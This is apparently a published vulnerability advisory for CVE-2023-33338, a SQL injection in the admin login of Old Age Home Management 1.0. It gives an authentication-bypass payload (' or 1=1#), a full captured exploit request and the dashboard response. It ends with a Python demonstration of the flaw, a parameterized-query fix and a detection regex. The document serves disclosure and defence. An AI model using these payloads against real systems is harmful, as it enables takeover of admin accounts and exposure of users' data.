CVE-2023-33338: CVE-nu11secur1ty/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0 at main · nu11secur1ty/CVE-nu11secur1ty
Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter.
The username parameter appears to be vulnerable to SQL injection. The payloads nu11secur1ty' or 1=1# and nu11secur1ty%27+or+1%3D1%23 were each submitted in the username parameter. The two requests produced different responses, indicating that the input is incorporated into a SQL query in an unsafe way. An attacker can easily take control of the admin account, after which the application and the data of its users are fully compromised.
POST /oahms/admin/login.php HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=n8igimmg4o7ddmpnbfueujouvg
Content-Length: 62
Cache-Control: max-age=0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://pwnedhost.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/oahms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=
HTTP/1.1 200 OK
Date: Sat, 29 Apr 2023 05:32:07 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
Content-Security-Policy: upgrade-insecure-requests;
X-Powered-By: PHP/8.2.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13518
<!DOCTYPE html>
<html lang="en">
<head>
<title>Old Age Home Management System|| Dashboard</title>
<!-- base:css -->
<link rel="stylesheet" href="vendors/typicons/typicons.css">
<link rel="stylesheet" href="vendors/css/vendor.bundle.base.css">
<link rel="stylesheet" href="css/vertical-layout-light/style.css">
<!-- endinject -->
</head>
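The following is an added example, not code from the advisory or from the Old Age Home Management System, showing why the quote-breaking username above bypasses a string-built login query, how the parameterized form of the same query is unaffected, and how the request body can be flagged on the server side. The admin table, its column names and the shape of the login query are assumptions about a typical PHP login; SQLite is used as a stand-in for MySQL, so the comment marker is -- instead of the # in the advisory's payload.

```python
import re
import sqlite3
from urllib.parse import parse_qs

def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the application's admin table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO admin VALUES (1, 'admin', 's3cret')")
    return con

def login_concat(con, username, password):
    """Assumed vulnerable pattern: user input spliced into the SQL text.
    With username "x' or 1=1--" the WHERE clause becomes
    username='x' or 1=1 and the rest of the query is commented out."""
    sql = (f"SELECT id FROM admin WHERE username='{username}' "
           f"AND password='{password}'")
    return con.execute(sql).fetchone()

def login_param(con, username, password):
    """Hardened form: placeholders keep the input as data, never as SQL,
    so the same payload simply fails to match any username."""
    sql = "SELECT id FROM admin WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone()

# Quote, then OR, then an always-true comparison, optionally a comment marker.
TAUTOLOGY = re.compile(r"""['"]\s*or\s+\S+?\s*=\s*\S+(#|--)?""", re.I)

def flag_login_body(body: str) -> bool:
    """Detection: decode the form body as the server would (%27 -> ', + -> space)
    and look for a quote-breaking OR-tautology in the username field."""
    fields = parse_qs(body, keep_blank_values=True)
    return any(TAUTOLOGY.search(v) for v in fields.get("username", []))

if __name__ == "__main__":
    db = make_db()
    payload = "nu11secur1ty' or 1=1--"
    print("concatenated query:", login_concat(db, payload, "password"))
    print("parameterized query:", login_param(db, payload, "password"))
    print("flagged:", flag_login_body(
        "username=nu11secur1ty%27+or+1%3D1%23&password=password&submit="))
```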